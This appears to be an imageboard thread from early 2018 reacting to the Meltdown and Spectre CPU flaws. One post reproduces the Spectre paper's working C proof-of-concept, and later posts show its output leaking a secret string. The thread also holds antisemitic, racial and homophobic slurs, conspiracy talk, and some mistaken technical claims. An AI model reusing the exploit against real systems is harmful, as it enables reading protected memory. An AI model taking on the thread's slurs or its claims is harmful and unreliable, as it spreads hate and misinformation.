▶ No.847131>>847136
>>847123
Especially now that atom's performance will be cut :D It's really unfortunate that VIA mobos aren't as available as atomshit. It would make a good replacement for old desktops.
▶ No.847132>>847138
>>847130
>>847081
>implying it's a config option which gives you the option to disable it
▶ No.847133
>>847081
I don't but starting the kernel with -nopti flag will give you back the performance afaik.
▶ No.847134>>847143
If the latest insider preview have the patch, then the ms did a good job, as the performance closely the same, only the io became a bit slower.
▶ No.847135
▶ No.847136
▶ No.847137
>>847110
pic
>>847119
Not a arguement.
▶ No.847138
>>847132
You're kidding, right?
Why wouldn't I have the option to disable it?
▶ No.847140>>847146 >>847150
>>847084
>This work was supported in part by the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 681402).
>This work was supported in part by NSF awards #1514261 and #1652259, financial assistance award 70NANB15H328 from the U.S. Department of Commerce, National Institute of Standards and Technology, the 2017-2018 Rothschild Postdoctoral Fellowship, and the Defense Advanced Research Project Agency (DARPA) under Contract #FA8650-16-C-7622.
glow in the darks and kikes have known about this for some time.
▶ No.847142>>847145 >>847146
>when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU
So this what Intel meant when they suggested AMD was affected, too? That if you enable an option disabled for security reasons then AMD has the same problem? lol.
▶ No.847143>>847152 >>847153
>>847122
Read the paper, I'm not here to spoonfeed you. TLDR is Spectre abuses the branch predictor to get one application to read an application's memory it's not supposed to. Meltdown abuses the kernel and lets you read kernel memory.
Spectre is a pain to fix because it abuses the branch predictor, and branch predictors are used in tons of CPUs.
Meltdown breaks down the wall that separates userspace and kernelspace. They are both very bad and difficult to fix, but for completely different reasons.
>>847134
Is this the result of Intel's $300 million in diversity? Hiring pajeets to do damage control on 8chan?
▶ No.847144
Remember, the elite want to build a techno-tyranny on this hardware. NWO BTFO.
▶ No.847145>>847148
>>847142
why isn't AMD capitalizing on this?
remember AMD has a huge contract to replace intel's integrated gpu's with theirs, and has the same botnet in the form of PSP. Two monopolies might as well be one monopoly and the choice is an illusion.
▶ No.847146
>>847142
Why didn't you listen?
>>847140
LURK MOAR. If you had lurked moar you would know everything is a fucking botnet.
▶ No.847147
▶ No.847150>>847154 >>847163
>>847140
>kikes have known about this for some time.
Look at the names of the security researchers and I think you'll find 'kikes' were responsible for finding and reporting this bug. Of course, you are a retarded /pol/nigger so you don't care about the technology but just want to have a seizure because you found the word Rothschild somewhere. Fuck off.
▶ No.847152
>>847143
>Read the paper, I'm not here to spoonfeed you.
I asked for a source. You could have just said 'the paper' (though there are two).
None of what you said actually supports the view that fixing Spectre will just be 'a compiler fix' (if that's what you're replying about). Are you sure you're not confusing branch prediction in the optimisation done by compilers with branch prediction done by the CPUs themselves?
▶ No.847153>>847155
>>847143
>Is this the result of Intel's $300 million in diversity? Hiring pajeets to do damage control on 8chan?
Damn you're right, I'm sure glad people actually did waste their hard earned money over a retarded companies mistake and all hope for workaround is lost. Praise AMD! Inshallah brother!
▶ No.847154
>>847150
>you'll find 'kikes' were responsible for finding and reporting this bug
gas yourself kike your people were responsible for creating this 'bug' in the first place.
▶ No.847155>>847158
>>847153
Sage negated, bigot.
▶ No.847157>>847176
▶ No.847158>>847161
>>847155
nothing was even saged rustfag
▶ No.847161>>847164 >>847165 >>847191
>>847158
Sorry someone from /r/sysadmin crosslinked here just sayin' hai :p
▶ No.847163>>847170
>>847150
Reminder that google is NSA funded.
▶ No.847164
>>847161
>plebbit circljerk of faggotry
▶ No.847166>>847167 >>847186
Is there any poc? The iaik repo haven't released it yet.
▶ No.847167
>>847166
Go back, no leet haxoring shit here for you.
▶ No.847169>>847193
>>847126
All glitchy 'n shiet. Now I'm paranoid it was malware.
▶ No.847170>>847292
>>847163
So either NSA fucking Kiketel alongside with poor goyims was a part of a much bigger plan, or suddenly everyone fucked everyone. Jesus Christ, what a time to be alive.
▶ No.847171
>AMD said in a statement: "The threat and the response to the three variants differ by microprocessor company, and AMD is not susceptible to all three variants. Due to differences in AMD's architecture, we believe there is a near zero risk to AMD processors at this time."
Based.
▶ No.847172
>>847124
I threw it together quickly without caring about sync
▶ No.847173>>847189 >>847319 >>847368
>>847093
AMDfag here, ran the code from Listing 4 in Spectre paper. T-that's bad, isn't it? I ran it on an old ThinkPad R60 too and it only died with SIGILL...
▶ No.847176>>847178 >>847895 >>848209
>>847157
>.de
go away nazi son of a bitch
▶ No.847178
>>847176
>implying Germany is at all Nazi in cy.
▶ No.847180>>847182 >>847184
There's moar to come
https://xenbits.xen.org/xsa/
INTEL IN FLAMES TOMORROW.
▶ No.847182
>>847180
Shut it down! The goyim knows!
▶ No.847186
>>847166
There was at least one at the end of one of the papers.
▶ No.847190>>847192 >>847226
SOMEONE TRY IT ON OLD "NEW WORLD" APPLE POWERPC HARDWARE!
▶ No.847191>>847195
>>847161
i looked to see and discovered this. this is exactly what's going to happen.
▶ No.847192>>847276
▶ No.847193
>>847169
>browsing the internet without blocking literally everything but text
Yes videos and images can be botnets if they abuse a bug in the rendering or parsing of said audio or video. Generally for the most security you want to use a up to date VLC and up to date libraries for watching videos via something like streamlink or youtube-dl. But there's still no garuntee that someone did not find a unpatched bug in the library used to render the endcoded format. Or in the case of (((WEBM))) by jewgle a intentional backdoor. But I think jewgle is saving the intentional backdoors for something like TANGO.
Just think about, a bug that everyone catches just because they opened a single image for a fraction of a second. But it is so much worse then that.
▶ No.847196
>>846705
I can't wait for the brainlet meme to die.
▶ No.847197>>847199 >>847201 >>847208
This website has gone to shit. /g/ and /pol/aks have taken over.
▶ No.847199>>847203
>>847197
luckily there's the whole rest of the internet for you to go back to
▶ No.847201>>847204 >>847205 >>847208
>>847197
By that I mean this thread have been derailed by these fucktards.
▶ No.847203>>847208
>>847199
My ass.
GTFO REEEEEEE
▶ No.847204
>>847201
Based /leftypol/ack telling it like it is.
It's an official happening thread now get with the times
▶ No.847205>>847216
>>847201
>derailed
The only ones I see derailing are the ones not calling (((them))) out.
▶ No.847207>>847209
>>847206
But it's still botnet because you can still exploit the bug even without the fix.
▶ No.847208
>>847197
>>847201
>>847203
t.butthurted, cucked kike lover
▶ No.847209
>>847207
I mean to say even with the fix
▶ No.847212
>>846245
>>846245
It means intel needs to reserve 35% of your CPU's computing power for its botnet now, just shut up and click apply.
▶ No.847214>>847322
Released
meltdownattack.com
RIP Intel.
▶ No.847216>>847228
>>847205
Go back to r/donald.
Donald is a Zionist kike lover and so are you.
▶ No.847218>>847224
intel should've checked its privilege
▶ No.847220>>847222 >>847223 >>847228
Is there a released list of what's been hit? Obviously saying "literally everything has been hit" is not at all helpful because that means some stuff hasn't. Just want to find a list of affected chips
▶ No.847222
▶ No.847223>>847229
>>847220
Every superscalar Intel CPU. Every single one.
atom might be safe
▶ No.847224
>>847218
They did and it cost them 300 million dollars. I guess Anita was not thorough enough ramming Intel up the backside with her SocJus poison.
▶ No.847226>>847230 >>847231
>>847190
>SOMEONE TRY IT ON OLD "NEW WORLD" APPLE POWERPC HARDWARE!
I am running PPC. Where is the code?
▶ No.847228
>>847220
Every x86 CPU with a MMU. Did you not read the thread?
>>847216
See above
▶ No.847229>>847233
>>847223
Quickly googling about spectre specifically has turned up results saying AMD and ARM processors are affected as well. I assume everyone has been pretty much raped?
▶ No.847230>>847249
▶ No.847231>>847234 >>847245
▶ No.847233>>847235 >>847236 >>847238
>>847229
All processors are vulnerable to sidechannel timing attacks to some degree. But we already know that, it's why we use chacha20/ed25519 and nothing else. You are using safe crypto, anon?
The Intel thing is far worse though, because it lets ring 3 read from ring 0. Or ring -3.
▶ No.847234>>847282
>>847231
Post the code you nigger.
▶ No.847235>>847236 >>847237
>>847233
If it lets write then we can disable the ring-3 backdoors ;)
▶ No.847236>>847246
>>847235
>>847233
Replace Your Exploit-Ridden Firmware with Linux - Ronald Minnich, Google
https://www.youtube.com/watch?v=iffTJ1vPCSo
Disabling Intel Management Engine w/System76
https://www.youtube.com/watch?v=MujjuTWpQJk
▶ No.847237
>>847235
But it's in hardware, you can't disable that.
that was a rhetorical question wasn't it?
▶ No.847238>>847266
>>847233
>he thinks chacha20 is safe
▶ No.847241
Is TempleOS safe from Jewtel?
▶ No.847242>>847247 >>847255 >>847259
▶ No.847244
Any way to find out how the patch affects performance? Are there any benchmarks being released for chipsets?
▶ No.847245>>847278 >>847297
>>847231
x86intrin.h: No such file or directory
▶ No.847246>>847258
>>847236
>Disabling Intel Management Engine w/System76
All post 2006/8 intel CPU has the ME physically embedded in the CPU it cannot be disabled definitively.
▶ No.847247>>847259
>>847242
I N T E L B T F O
▶ No.847249
>>847230
That is for x86. And it wants me to run it as root. Nope.
▶ No.847250>>847251
I've read on different places that Intel's sold his shares? I don't have a source on this, but would be hilarious if true.
▶ No.847251>>847253
>>847250
Yes the CEO sold half of his shares in December. Don't worry though it had nothing to do with this.
▶ No.847253>>847254
>>847251
Yeah, nothing to worry about. Nothing at all like the Equifax executives who did the same thing.
▶ No.847254
>>847253
But the methods were reported to the manufacturers and cloud operators in July. So maybe it reached the top only recently? I mean it doesn't really make sense to sell the shares of the company you are leading imho.
▶ No.847255>>847296
>>847242
I'd post some smug anime girl if I wasn't on tor.
▶ No.847258>>847272 >>847274
>>847246
ME can be toggled so long as it's not a hypermodern Intel CPU; I think the cutoff is Haswell or Skylake. However the process is a lot of dicking around for a "feature" that should not be there in the first place.
▶ No.847259
>>847247
>>847242
Ya and he was replying directly to Andi Kleen <ak@linux.intel.com>
▶ No.847260>>847263 >>847264
So, for pragmatic purposes, the 'meltdown' bug is mediated by page table isolation update mostly hurts IO on Intel CPUs, potentially hurting server providers immensly, and leaves systems that do not receive kernel updates vulnerable to attacks reading kernel memory.
The 'spectre' one seems a lot worse, since many more architectures are vulnerable, most importantly ARM, although the authors have written patches.
Am I correct in assuming shit is about to go down since billions of old android devices from smartphones to smart toasters won't receive any security updates?
▶ No.847263>>847279
>>847260
Destroy your net connection and all will be fine ;)
▶ No.847264
>>847260
The NWO techno control grid is nothing more than a paper tiger.
Mono-cultures are bad, one disease and everything dies.
▶ No.847266>>847279
>>847238
>A populace can be brought to heel by telling them they are under attack from a foreign adversary
▶ No.847267>>847279 >>847908
Time to get a 486 mobo and start assembling the computer
▶ No.847272>>847279 >>847292
>>847258
I'd advise you not to trust any CPU with the ME hardware, even if it's the "super NSA switch!!1!".
▶ No.847274
>>847258
>ME can be toggled
It can but we don't have long term data on if it's going to say like that it might power on again because LMAO the bios/uefi battery died and needed to be replaced or other unpredictable shit.
That's why system76 and similar who are selling MEcleaned hardware are lying the ME is still there and there's no guaranty except for old thinkpad hardware were the ME can totally be removed.
>However the process is a lot of dicking around for a "feature" that should not be there in the first place.
True
▶ No.847276
>>847192
>As of April 2017, the current version is MIPS32/64 Release 6.[3][4] MIPS32/64 primarily differs from MIPS I--V by defining the privileged kernel mode System Control Coprocessor in addition to the user mode architecture.
> by defining the privileged kernel mode System Control Coprocessor in addition to the user mode architecture.
RMS was right all along.
▶ No.847278>>847290 >>847297
>>847245
/var/log/packages/gcc-7.2.0-i586-1:usr/lib/gcc/i586-slackware-linux/7.2.0/include/x86intrin.h
/var/log/packages/llvm-5.0.1-i586-1:usr/lib/clang/5.0.1/include/x86intrin.h
▶ No.847279>>847284 >>847298
>>847263
>he thinks cutting off his internet connection will save him from wifi enabled botnets passing by his home
>>847267
>he thinks older x86 hardware with MMU's aren't vulnerable
>>847272
Depends on the level of trust you are going for. But otherwise this is true.
>>847266
I'm not a "muh russia" retard. I am completely serious, chacha20 will not keep you safe.
▶ No.847282>>847287 >>847294 >>847313 >>847374 >>847556
>>847234
Sample code using Spectre dumped from the PDF (but it's a formatting mess):
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
char *secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0;
/* Used so compiler won’t optimize out victim_function() */
void victim_function(size_t x) {
if (x < array1_size) {
temp &= array2[array1[x] * 512];
}
}
/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80)
/* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
int tries, i, j, k, mix_i, junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t *addr;
for (i = 0; i < 256; i++)
results[i] = 0;
for (tries = 999; tries > 0; tries--) {
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]);
/* intrinsic for clflush instruction */
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
_mm_clflush(&array1_size);
for (volatile int z = 0; z < 100; z++) {}
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF;
/* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16));
/* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = &array2[mix_i * 512];
time1 = __rdtscp(&junk);
/* READ TIMER */
junk = *addr;
/* MEMORY ACCESS TO TIME */
time2 = __rdtscp(&junk) - time1;
/* READ TIMER & COMPUTE ELAPSED TIME */
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
results[mix_i]++;
/* cache hit - add +1 to score for this value */
}
/* Locate highest & second-highest results results tallies in j/k */
j = k = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
k = j;
j = i;
} else if (k < 0 || results[i] >= results[k]) {
k = i;
}
}
if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
break;
/* Clear success if best is > 2*runner-up + 5 or 2/0) */
}
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
value[0] = (uint8_t)j;
score[0] = results[j];
value[1] = (uint8_t)k;
score[1] = results[k];
}
int main(int argc, const char **argv) {
size_t malicious_x=(size_t)(secret-(char*)array1);
/* default for malicious_x */
int i, score[2], len=40;
uint8_t value[2];
for (i = 0; i < sizeof(array2); i++)
array2[i] = 1;
/* write to array2 so in RAM not copy-on-write zero pages */
if (argc == 3) {
sscanf(argv[1], "%p", (void**)(&malicious_x));
malicious_x -= (size_t)array1;
/* Convert input value into a pointer */
sscanf(argv[2], "%d", &len);
}
printf("Reading %d bytes:\n", len);
while (--len >= 0) {
printf("Reading at malicious_x = %p... ", (void*)malicious_x);
readMemoryByte(malicious_x++, value, score);
printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[0],
(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
return (0);
}
▶ No.847284>>847287
>>847279
destroy wifi ic, network ic, cut cables, shield device, no net, no botnet.
▶ No.847287>>847288 >>847556
>>847284
Define "shielded"
>>847282
Why would those retards do this? Now every script kiddy and their mother can abuse this with ease.
▶ No.847288>>847289
>>847287
go to place with faraday shielding/enclose computer in metal cage, or box
▶ No.847289
>>847288
So this would be a laptop form factor and running off of battery? In such a case yea, it is not a botnet depending on how you did some other things. But if you mean a stationary power supplied desktop, then its a fucking botnet still.
▶ No.847290>>847297 >>847915
>>847278
Ya I dont think this will run on PPC.
x86intrin.h needs ia32intrin.h and other x86 shit.
▶ No.847292>>847293 >>847311
>>847170
To me in the case of Meltdown, it seems Intel made a mistake due to gross negligence going back for years (if not decades). Think of how many legacy systems are open books right now with their ass exposed on the net for the whole world to hit up and no hope for a patch. This is potentially up there with the mid-90s math bug.
>>847272
Oh, I'm not saying I do. Far from it in fact. The fact that the ME is horrifically insecure (by mistake AND design), and this new problem, are indications that you shouldn't be on an Intel processor at all for the foreseeable (read: 5-10 years plus if ever) future.
▶ No.847293
>>847292
It's worse as it affects all x86 systems with a MMU.
▶ No.847294>>847300 >>847304
>>847282
/
/
Reading 40 bytes:
Illegal instruction
/
/
Am I safe from specter?
▶ No.847296>>848209
>>847255
All good* torposters use web proxies to not stand out like faggots.
Check out proxies on /test/ because most block image uploads.
https://www.4everproxy.com/ https://www.kproxy.com/
These two work well.
t. military-grade autist torfag
never use javascript
* there are no good torposters
▶ No.847297>>847308 >>847915
>>847245
>>847278
>>847290
Same thing on my machine. Looks like that header provides rdtscp and clflush, which don't seem to exist on PowerPC. Further down the rabbit hole it wants mm3dnow.h and rdseedintrin.h among others. This code will never run on PowerPC.
▶ No.847298>>847301 >>847349
>>847279
> mmu is the problem
P6 (pentium pro) was the first intel cpu to get speculative execution ( so no spectre before p6 ) and meltdown is mitigated by software
▶ No.847300>>847303 >>847304
>>847294
Hard to tell, I had the same happen on ThinkPad R60
▶ No.847301
>>847298
It's not mitigated, it is delayed. Theres more then one way to abuse it. Lurk more.
▶ No.847303>>847306
>>847300
I think it has something to do with reading too much of some type of memory/cache or something.
x200 user here.
▶ No.847304>>847309 >>847313 >>847321 >>847325 >>847556
>>847294
>>847300
from my x230:
Linux devuan-x230 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64 GNU/Linux
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfed68... Success: 0x54=’T’ score=2
Reading at malicious_x = 0xffffffffffdfed69... Success: 0x68=’h’ score=7 (second best: 0x05 score=1)
Reading at malicious_x = 0xffffffffffdfed6a... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfed6b... Success: 0x20=’ ’ score=17 (second best: 0x00 score=4)
Reading at malicious_x = 0xffffffffffdfed6c... Success: 0x4D=’M’ score=2
Reading at malicious_x = 0xffffffffffdfed6d... Success: 0x61=’a’ score=15 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfed6e... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffffffffffdfed6f... Success: 0x69=’i’ score=11 (second best: 0x00 score=1)
Reading at malicious_x = 0xffffffffffdfed70... Success: 0x63=’c’ score=15 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfed71... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfed72... Success: 0x57=’W’ score=13 (second best: 0x00 score=6)
Reading at malicious_x = 0xffffffffffdfed73... Success: 0x6F=’o’ score=2
Reading at malicious_x = 0xffffffffffdfed74... Success: 0x72=’r’ score=15 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfed75... Success: 0x64=’d’ score=2
Reading at malicious_x = 0xffffffffffdfed76... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfed77... Success: 0x20=’ ’ score=15 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfed78... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfed79... Success: 0x72=’r’ score=13 (second best: 0x00 score=6)
Reading at malicious_x = 0xffffffffffdfed7a... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfed7b... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfed7c... Success: 0x53=’S’ score=2
Reading at malicious_x = 0xffffffffffdfed7d... Success: 0x71=’q’ score=2
Reading at malicious_x = 0xffffffffffdfed7e... Success: 0x75=’u’ score=7 (second best: 0x05 score=1)
Reading at malicious_x = 0xffffffffffdfed7f... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfed80... Success: 0x61=’a’ score=15 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfed81... Success: 0x6D=’m’ score=7 (second best: 0x05 score=1)
Reading at malicious_x = 0xffffffffffdfed82... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffffffffffdfed83... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfed84... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffffffffffdfed85... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfed86... Success: 0x4F=’O’ score=2
Reading at malicious_x = 0xffffffffffdfed87... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfed88... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfed89... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffffffffffdfed8a... Success: 0x66=’f’ score=2
Reading at malicious_x = 0xffffffffffdfed8b... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffffffffffdfed8c... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfed8d... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffffffffffdfed8e... Success: 0x65=’e’ score=17 (second best: 0x05 score=6)
Reading at malicious_x = 0xffffffffffdfed8f... Success: 0x2E=’.’ score=2
▶ No.847306
>>847303
By that I mean that it might still be affected but since they wrote this for i7 it is calling too much memory for the old processors to handle. I'll go back to the paper.
▶ No.847308>>848209
>>847297
Ok thanks for confirming. I guess I will just sit back and watch the show.
x86 was a mistake
▶ No.847311>>847314 >>847316
>>847292
>due to gross negligence
They were grossly negligent of not anticipating every possible way that it could leak data? I'm looking at the papers, and it's some pretty esoteric shit. Determining the value in a byte by picking out which cache line was filled by an instruction that didn't execute? If you're telling me that an attack that took 25 years to be discovered was so obvious that it's negligence, you are full of shit.
>Think of how many legacy systems are open books right now with their ass exposed on the net for the whole world to hit up and no hope for a patch.
In order for any of these to work, you have to be able to execute code on the target machine. JS may be vulnerable, and is really the only attack vector for the vast majority of these machines, which probably have much easier JS vulnerabilities to exploit.
Really, it's the cloud providers who are and should be shitting themselves. This allows customers to spy on one another.
▶ No.847313>>847317 >>847318 >>847321 >>847325 >>847364 >>847556
>>847304
>>847282
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeeb8... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeeb9... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeeba... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeebb... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeebc... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeebd... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeebe... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeebf... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec0... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec1... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec2... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec3... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec4... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec5... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec6... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec7... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec8... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeec9... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeeca... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeecb... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeecc... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeecd... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeece... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeecf... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed0... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed1... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed2... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed3... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed4... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed5... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed6... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed7... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed8... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeed9... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeeda... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeedb... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeedc... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeedd... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeede... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeedf... Success: 0xFF=’?’ score=0
Phenom II X4 955 C3 stepping (Deneb)
▶ No.847314
>>847311
>Really, it's the cloud providers who are and should be shitting themselves. This allows customers to spy on one another.
Cloud providers and web users. Javashit is an STD vector!
▶ No.847316>>847926
>>847311
So if your a VPS provider you have to be shitting bricks right now.
▶ No.847317>>847319 >>847330 >>847336
>>847313
Post pics of the terminal, I don't believe it.
▶ No.847318>>847319 >>847320
>>847313
kek
enjoy your psp.
▶ No.847319>>847331
>>847317
Note I'm >>847173 and had the same result on AMD A6-5400K APU.
I'm confused now but since that phrase is stored in a secret array, I guess it's broken when the result pops up on execution?
>>847318
My APU is 15h, it doesn't ship with (((PSP)))
▶ No.847320
>>847318
phenom II doesn't have PSP you dumb nigger
▶ No.847321
>>847313
>score=0
I think that means he is safe.
>>847304
fucked
▶ No.847322
>>847214
>This work was supported in part by the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 681402).
>This work was supported in part by NSF awards #1514261 and #1652259, financial assistance award 70NANB15H328 from the U.S. Department of Commerce, National Institute of Standards and Technology, the 2017-2018 Rothschild Postdoctoral Fellowship, and the Defense Advanced Research Project Agency (DARPA) under Contract #FA8650-16-C-7622.
>European Research Council (ERC) under the European Union
>Rothschild Postdoctoral Fellowship
>Defense Advanced Research Project Agency (DARPA)
WTF I LOVE THE ZOG NOW
▶ No.847323
i wonder if microsoft is going to patch XP again like they did the last massive vulnerability
▶ No.847325>>847329
>>847313
>>847304
I've been messing around with GCC 5.4.0 Cygwin, notes:
With no optimization or -O1 : Works.
-O2 or -O3 Fails.
▶ No.847329>>847331 >>847337
>>847325
Cygwin run on i5-540M with no optimisation and -O2. This is weird.
▶ No.847330>>847334 >>847337 >>847364 >>847556
>>847317
Everything is fucked.
▶ No.847331
>>847319
>>847329
>unclear
>success
>two different parameters
This is now a happening thread
▶ No.847334>>847338
>>847330
i think that means your good
▶ No.847337
>>847330
>score=0
Your safe
This guy is fucked
>>847329
▶ No.847338>>847340
>>847334
No it means it successfully read the secret. It also means you should turn off javascript and never turn it on again.
>>847336
AMD wins the award with jewtel for biggest idiots to use the x86 architecture.
▶ No.847339
ivy bridge inside of a Xubuntu 17.04 LTS VM inside of VirtualBox.
▶ No.847340>>847556
>>847338
>AMD wins the award with jewtel for biggest idiots to use the x86 architecture.
What are you talking about? The exploit failed. It got back nothing.
If you see these your fucked. The code can read back the magic word.
▶ No.847341>>847346 >>847352 >>847523
>>846216
>>846687
>>846708
>>846723
>>846738
>>846972
>and all the other retards in this thread
You're all retarded if you dont think AMD chips are effected as well
http://www.amd.com/en/corporate/speculative-execution
▶ No.847342>>847344 >>847345 >>847349
So, how far back of Intel generations does specter affect?
as far as I know it may be core duo and back.
▶ No.847344>>847348 >>847350
>>847342
>and back.
affects all intel cpus since 1995
▶ No.847345>>847350 >>847931
>>847342
Anything running x86 with an MMU. So preety much every x86 proccessor.
▶ No.847346
>>847341
>effected
fuck off, Intel pajeet
the problem isn't speculative execution but how Intel implemented it
▶ No.847348
>>847344
anyone have a Pentium 4 they could test this on? lol
▶ No.847349
>>847342
By that I mean that this particular code does not execute on those platforms. >>847298 said, p6 so ...
▶ No.847350>>847351
>>847344
>>847345
Doesn't that apply specifically to Meltdown? Specter is kind of unknown from what I can tell.
▶ No.847351
>>847350
Oh you are right, those are two different exploits. Carry on.
▶ No.847353
▶ No.847355
>>847352
Intel on suicide watch
▶ No.847356>>847357
▶ No.847358
>>847357
Should someone tell him about this?
▶ No.847359>>847362
https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/
>Several recently-published research articles have demonstrated a new class of timing attacks (Meltdown and Spectre) that work on modern CPUs. Our internal experiments confirm that it is possible to use similar techniques from Web content to read private information between different origins.
ITS HAPPENING
▶ No.847360>>847363
>>847352
AMD explicitly states they're effected on their website you retard
▶ No.847361>>847366
>Assume for now that ALL x86 CPUs are insecure
▶ No.847363>>847367
>>847360
it's affected you retarded poonigger
▶ No.847364>>847368 >>847369 >>847370 >>847372 >>847375
>>847330
>>847336
>>847313
